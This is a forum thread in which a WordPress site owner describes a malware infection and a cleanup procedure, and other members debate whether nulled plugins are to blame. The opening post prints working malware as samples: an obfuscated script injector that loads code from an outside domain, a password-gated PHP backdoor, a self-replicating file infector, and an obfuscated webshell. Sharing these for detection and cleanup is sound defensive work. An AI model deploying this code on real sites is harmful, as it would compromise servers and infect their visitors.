Wordpress Hack [Replicating Malware with redirection + not so easy fix]

nesym

Active member
Babiato Lover
Sep 8, 2019
365
191
43
Why do I post that?

Educational purpose. If anyone stumbles upon something similar to know how to deal with it in the best way possible.

Why did I get malware/hacked in the first place?

No one to blame but yourself. You decide what you are going to put on your web server and only you have the power to do so. Most likely poor hardening, configuration, outdated plugins/software, or malicious file uploaded directly by you.

Another good answer to this is:
Because hackers want to achieve something. From SEO to phishing/scam/steal data/just do harm/for fun because they can.

Ok, so many of you have been here. One of my projects just got defaced. That's the risk of using Wordpress and using nulled themes and plugins. To be honest I normally scan the files before I upload them to the server but lately I was just too bold because I wasn't finding anything suspicious since I'm using only Babiato and uploaded them straight to the server. Even though Babiato has it's good reputation and members here always helped each other (also helped me many times) there is always the option that one out of 1000 uploaders decides to put something funny in his uploads.

How to clean the hack?

1. Backup the hacked web server as is (with the malware)
2. Backup the DB files
3. Create a virtual machine
4. Sync the server to the virtual machine
5. Nuke the god damn server with the ground
6. Forbid it's access to the WWW and scan the virtual machine using tools like clamAV, aibolit, wordfence and
7. Clean all the folders and files manually by removing them and removing strings in the code
8. Clean the database manually
9. Set the new server from the ground up
10. Hardening the server
11. Change all your db names and passwords
12. Make an rsync backup every week and keep it somewhere on your PC

What exactly is that malware doing?

It has a php/js file that executes the malware. Normaly it's not a rootkit but just a normal malware that spreads across all folders that have www-data user access in the main public_html folder.

In my case, I think what installs the functions of the malware was masked as an .ico
then it shits all over your .JavaScript and .PHP also .JSON and tries to replicate a malicious code.

Here is an example of how it looks.

Redirection to:

The part that you have to GREP in JS/PHP:

Code:
Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

Decoded it looks like this:

JavaScript:
    Element.prototype.appendAfter = function(element) {
    element.parentNode.insertBefore(this, element.nextSibling);
}
, false;
    (function() {
     var elem = document.createElement(script);
     elem.type = text/javascript elem.src = https://store.dontkinhooot.tw/stat.jselem.appendAfter(document.getElementsByTagName(script)[0]);
    elem.appendAfter(document.getElementsByTagName(head)[0]);
    document.getElementsByTagName(head)[0].appendChild(elem);
}
)();
    Element.prototype.appendAfter = function(element) {
    element.parentNode.insertBefore(this, element.nextSibling);
}
, false;
    (function() {
     var elem = document.createElement(script);
     elem.type = text/javascript elem.src = https://store.dontkinhooot.tw/stat.jselem.appendAfter(document.getElementsByTagName(script)[0]);
    elem.appendAfter(document.getElementsByTagName(head)[0]);
    document.getElementsByTagName(head)[0].appendChild(elem);
}
)();
var isIE=!1,isEdge=!1;

Check your Wordpress for files like wp-stream.php, wp-xmlrpc.php (there shouldn't be no wp-xmlrpc but only xmlrpc.php in the default wp install)

wp-stream.php content

PHP:
<?php  if(isset($_POST['lt']) && md5($_POST['lt']) == base64_decode("MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=") ) {$lt = base64_decode($_POST['a']);file_put_contents('lte_','<?php '.$lt);$lt='lte_';if(file_exists($lt)){include($lt);unlink($lt);}} ?>

Decoded it looks like this:

PHP:
if(isset($_POST['lt']) && md5($_POST['lt']) == 023258bbeb7ce955a690dca056be885d ) {$lt = ;file_put_contents('lte_',''.$lt);$lt='lte_';if(file_exists($lt)){include($lt);unlink($lt);}}

I also noticed this not long ago, they may be connected:
(This you can find in your home page when looking at the view page source)


HTML:
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">

<a style="font-size:18px;" href="https://downapkmod.com/" title="https://downapkmod.com/">https://downapkmod.com/</a>,

<a style="font-size:18px;" href="https://apkcop.com/" title="https://apkcop.com/">https://apkcop.com/</a>

</div>

lte_ content
Code:
<?php ini_set('max_execution_time', '300');
ini_set('memory_limit', '-1');

$files = array();
$b = "/../../../../../../../../";
$l = "/";
 $it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT']);
  $display = Array ( 'php' );
        $search = Array('.js');
        $files_ar = array();

        foreach(new RecursiveIteratorIterator($it) as $file)
        {
             if (strpos($file->getFilename(),'.js') == true || strpos($file->getFilename(),'.js') == true)
                {
            
                    $q = strposa($file->getFilename(), $search);
                    if($q != ""){
                        array_push($files,$file->getPathname());
                    }
                

            }
        }
        foreach($files as $onefile) {
    
    make_work($onefile);
    
}


for ($i = 1; $i < 8; $i++) {
    $l .= "../";
try {
  $it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT'].$l);
  $display = Array ( 'php' );
        $search = Array('.js');
        $files_ar = array();

        foreach(new RecursiveIteratorIterator($it) as $file)
        {
             if (strpos($file->getFilename(),'.js') == true || strpos($file->getFilename(),'.js') == true)
                {
            
                    $q = strposa($file->getFilename(), $search);
                    if($q != ""){
                        array_push($files,$file->getPathname());
                    }
                

            }
        }
        foreach($files as $onefile) {
    
    make_work($onefile);
    
}
} catch (Exception $e) {
  
}

}

function strposa($haystack, $needle, $offset=0) {
        if(!is_array($needle)) $needle = array($needle);
        $stroke = "";
        foreach($needle as $query) {
            if(strpos($haystack, $query, $offset) !== false) { $stroke .= $query."|";}
        }
        return $stroke;
    }

function make_work($f){
                $g = file_get_contents($f);
            
                                        

if (strpos($g, '102,111,114,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119') !== false) {

} else {

$l2 = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();";
$g = file_get_contents($f);
$g = $l2.$g;
@system('chmod 777 '.$f);
@file_put_contents($f,$g);
echo $f."<br />";
}

    
}

randomstring.php

Code:
<?php
$vrtna = '90b_xpdt*l63k8#yancofsrgmuvH72451\'ei-';$umcear = Array();$umcear[] = $vrtna[27].$vrtna[8];$umcear[] = $vrtna[18].$vrtna[22].$vrtna[34].$vrtna[16].$vrtna[7].$vrtna[34].$vrtna[3].$vrtna[20].$vrtna[25].$vrtna[17].$vrtna[18].$vrtna[7].$vrtna[35].$vrtna[19].$vrtna[17];$umcear[] = $vrtna[29].$vrtna[10].$vrtna[18].$vrtna[32].$vrtna[10].$vrtna[31].$vrtna[2].$vrtna[34].$vrtna[36].$vrtna[1].$vrtna[10].$vrtna[31].$vrtna[18].$vrtna[36].$vrtna[30].$vrtna[31].$vrtna[11].$vrtna[29].$vrtna[36].$vrtna[13].$vrtna[13].$vrtna[18].$vrtna[30].$vrtna[36].$vrtna[30].$vrtna[0].$vrtna[11].$vrtna[30].$vrtna[1].$vrtna[29].$vrtna[20].$vrtna[29].$vrtna[29].$vrtna[13].$vrtna[28].$vrtna[10];$umcear[] = $vrtna[14];$umcear[] = $vrtna[18].$vrtna[19].$vrtna[25].$vrtna[17].$vrtna[7];$umcear[] = $vrtna[21].$vrtna[7].$vrtna[22].$vrtna[3].$vrtna[22].$vrtna[34].$vrtna[5].$vrtna[34].$vrtna[16].$vrtna[7];$umcear[] = $vrtna[34].$vrtna[4].$vrtna[5].$vrtna[9].$vrtna[19].$vrtna[6].$vrtna[34];$umcear[] = $vrtna[21].$vrtna[25].$vrtna[2].$vrtna[21].$vrtna[7].$vrtna[22];$umcear[] = $vrtna[16].$vrtna[22].$vrtna[22].$vrtna[16].$vrtna[15].$vrtna[3].$vrtna[24].$vrtna[34].$vrtna[22].$vrtna[23].$vrtna[34];$umcear[] = $vrtna[21].$vrtna[7].$vrtna[22].$vrtna[9].$vrtna[34].$vrtna[17];$umcear[] = $vrtna[5].$vrtna[16].$vrtna[18].$vrtna[12];foreach ($umcear[8]($_COOKIE, $_POST) as $mcysgb => $slevav){function ytmnrg($umcear, $mcysgb, $cbodj){return $umcear[7]($umcear[5]($mcysgb . $umcear[2], ($cbodj / $umcear[9]($mcysgb)) + 1), 0, $cbodj);}function etbln($umcear, $uvrzj){return @$umcear[10]($umcear[0], $uvrzj);}function jvjpux($umcear, $uvrzj){$mltsule = $umcear[4]($uvrzj) % 3;if (!$mltsule) {$kbjfl = $umcear[1]; $wtmzk = $kbjfl("", $uvrzj[1]($uvrzj[2]));$wtmzk();exit();}}$slevav = etbln($umcear, $slevav);jvjpux($umcear, $umcear[6]($umcear[3], $slevav ^ ytmnrg($umcear, $mcysgb, $umcear[9]($slevav))));}


To the so called hackers:

Annoying I admit... you now force me to use docker for every single website installation and find other ways to protect myself.

To the people that got hacked:

Try to share what you got, how you think you got it, but don't insist and blame someone if you don't have the evidence. Sharing helps others protect against similar attacks and figuring out how they got hacked in the first place.

PS: I found the core of the code before it deleted itself (have my ways) but I am not publishing it because it can be used the other way around.

test edit because I have some error when editting
 
Last edited:

underwater

Active member
Nov 26, 2020
256
63
28
Thank you for this nice detailed guide. I was nerveous to read the title earlier.
 

Mscv50

! 𝖎'𝖒 𝖜𝖆𝖙𝖈𝖍𝖎𝖓𝖌 𝖞𝖔𝖚 !
Babiato Lover
GiveAway Master
Trusted Uploader
Jan 10, 2020
3,712
18,802
113
🦇The Dark Night🦇
The infected files downloaded from Babiato?
Please share here more info about it so the admins can cure or ban or....
 

MrSam_1

Well-known member
Administrative
Trusted Seller
Dec 1, 2018
23,638
26,971
120
The infected files downloaded from Babiato?
Please share here more info about it so the admins can cure or ban or....
Possibly The Plus Addons for Elementor hack from the other day maybe?
 

hellearth

Active member
Aug 19, 2020
365
113
43
How to clean the hack?

1. Backup the hacked web server as is (with the malware)
2. Backup the DB files
3. Create a virtual machine
4. Sync the server to the virtual machine
5. Nuke the god damn server with the ground
6. Forbid it's access to the WWW and scan the virtual machine using tools like clamAV, aibolit, wordfence and
7. Clean all the folders and files manually by removing them and removing strings in the code
8. Clean the database manually
9. Set the new server from the ground up
10. Hardening the server
11. Change all your db names and passwords
12. Make an rsync backup every week and keep it somewhere on your PC
This is a complete guide but not everyone can do it. The would be nice if anyone shared their documents
 

Saint Gabriel

Well-known member
Jan 3, 2020
2,998
3,049
113
I think if your host has Imunify 360 installed in cpanel, it nullifies and removes malwares. Works for me.
 

sunmughan

Active member
Banned User
Dec 31, 2019
238
159
43
CDN
codeair.in
Informative post and a really good article to read peacefully. Sometimes, a good hosting can play the role itself by kicking the malwares automatically through its scan.
 
  • Like
Reactions: Saint Gabriel

MrSam_1

Well-known member
Administrative
Trusted Seller
Dec 1, 2018
23,638
26,971
120
Ok, so many of you have been here. One of my projects just got defaced. That's the risk of using Wordpress and using nulled themes and plugins.
I'm using only Babiato and uploaded them straight to the server. Even though Babiato has it's good reputation and members here always helped each other (also helped me many times) there is always the option that one out of 1000 uploaders decides to put something funny in his uploads.

For these 2 statements allow me to disagree. Couple days ago found this specific injection on 3 different servers.
All of them had legit themes and plugins not even one nulled. Can you explain it before pointing fingers?
 

phineas

Active member
Trusted Uploader
Jul 5, 2018
138
177
43
Maybe, maybe not.

But my point is more that even only using legit purchased licenced plugins/themes and running security such as wordfence doesn't leave you immune from attack as the events of this week have proven.

This. Not just nulled plugins got malware - others simply don't get security updates or have a non-disclousured security bug, even official ones... WordPress has this downside, but I think that with good monitoring (wordfence for modified files for example), or as stated in the post, using docker containers or individual Cpanel accounts will make this hard to spread between your websites :)
 
  • Like
Reactions: MrSam_1

Mscv50

! 𝖎'𝖒 𝖜𝖆𝖙𝖈𝖍𝖎𝖓𝖌 𝖞𝖔𝖚 !
Babiato Lover
GiveAway Master
Trusted Uploader
Jan 10, 2020
3,712
18,802
113
🦇The Dark Night🦇
Maybe, maybe not.
But my point is more that even only using legit purchased licenced plugins/themes and running security such as wordfence doesn't leave you immune from attack as the events of this week have proven.

Totally agree with you and like @slvrsteele post above yours, that's what i really want to say to the Op.
 
  • Like
Reactions: MrSam_1

nesym

Active member
Babiato Lover
Sep 8, 2019
365
191
43
For these 2 statements allow me to disagree. Couple days ago found this specific injection on 3 different servers.
All of them had legit themes and plugins not even one nulled. Can you explain it before pointing fingers?

Try not taking it personal, please. I am not trying to attack anyone. Actually I'm thankful for everything I got out of the Babiato forum and I myself love to contribute as much as I can. If you read my post carefully enough you'll see I'm not pointing fingers. People describe me as a very rational and logical person and I tend to agree. My only motive here is to arouse attention, see if other members have similar problems. Start a discussion, hopefully a one that will be beneficial for everyone. With all the respect to those people who share resources, their time and dedication. I very well understand the risks and that your server can be compromised from the outside even though that's very unlikely when you take the right measures.
 

nesym

Active member
Babiato Lover
Sep 8, 2019
365
191
43
Possibly The Plus Addons for Elementor hack from the other day maybe?

That's possible but I believe not. I only had that plugin on a single website and changed strings and names so no one would actually suspect it's that exact plugin. I even have a custom version of Elementor and others so I doubt an automated attack would happen. Also most of the countries outside of my region are banned from accessing sensitive content. You have to know how I changed those plugin strings in order to make use of the attack. For example if someone was looking for "Elementor" he wouldn't find a single line of code in my code containing that string. It goes the same for every other plugin. It costs me extra efforts but helps me improve security. Also anyone please don't ask for a tutorial on this just take it as is.
 

MrSam_1

Well-known member
Administrative
Trusted Seller
Dec 1, 2018
23,638
26,971
120
I wasn't taking it personal, don't get me wrong. But everyone always blames the nulled things. They might be right probably 50% of the time. But no one thinks of lazy or rookie developers that tries to get on front for a buck or two or of those complicated scripts that displays a simply date and hour during 50 files of php code.
Making mistakes as a developer is human and some learns from their mistakes and improve while others just don't care and keep going. Some just thinks that aligning 3 lines of codes makes them developers without any knowledge of coding safety practice or code security.

But every single end user out there is blaming the nulled versions of those scripts and it's not fair.
 
  • Like
Reactions: imtiyazali4410

Mscv50

! 𝖎'𝖒 𝖜𝖆𝖙𝖈𝖍𝖎𝖓𝖌 𝖞𝖔𝖚 !
Babiato Lover
GiveAway Master
Trusted Uploader
Jan 10, 2020
3,712
18,802
113
🦇The Dark Night🦇
Deleted? why?
Brothers, i am not attacking anyone on here ! I was just curious about which files get infected that's all.
Passion for technology led this 50 years old men to be an expert in many IT fields :cool:
 

MrSam_1

Well-known member
Administrative
Trusted Seller
Dec 1, 2018
23,638
26,971
120
It was too big and too direct. Sorry for that.

If you wanna see the patterns of an attack then check the file timestamp for last modified and sync with error and access log for that period of time. On one of servers I was talking about the attacker tried for hours to find a flaw and found a way to use the update option of wp-admin.
185.212.129.205 - - [10/Mar/2021:11:58:28 +0100] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 561878

Most used attack is by scanning the users trough xmlrpc using the [login] request and try to bruteforce the login.
Another most common attack was using revslider exploit (didn't try lately so I don't know if it still works but I still see scans for revslider on server logs)
There are many plugins/themes/scripts with well known flaws and 0-day critical flaws and that's why I always say to check your used plugins/themes against vulnerability database.
 

huda98

New member
Apr 4, 2021
21
21
3
ES.Java
That's possible but I believe not. I only had that plugin on a single website and changed strings and names so no one would actually suspect it's that exact plugin. I even have a custom version of Elementor and others so I doubt an automated attack would happen. Also most of the countries outside of my region are banned from accessing sensitive content. You have to know how I changed those plugin strings in order to make use of the attack. For example if someone was looking for "Elementor" he wouldn't find a single line of code in my code containing that string. It goes the same for every other plugin. It costs me extra efforts but helps me improve security. Also anyone please don't ask for a tutorial on this just take it as is.
How did you hide that string? Are you manualy change the plugin code or something else?.
 

untergrund

New member
Feb 12, 2020
1
0
3
I had a similar case where an additional .htaccess file was copied into each folder. In the public directory were a lot of changed and new files. It took a bit of time, but now the site is running normally again. To remove all the .htaccess files I ran a shell script. This saved a lot of work. The rest I had to clean manually.

The problem is that I haven't figured out where the malware came from. Especially because I hadn't changed or updated anything on the site for a few months.
 

Dawid

New member
Jun 6, 2022
0
0
0
based on my experience

1st if download from nulled web, i run local in my sandbox, after check and clean, i push to server or host.
 

About us

  • Our community has been around for many years and pride ourselves on offering unbiased, critical discussion among people of all different backgrounds. We are working every day to make sure our community is one of the best.

Quick Navigation

User Menu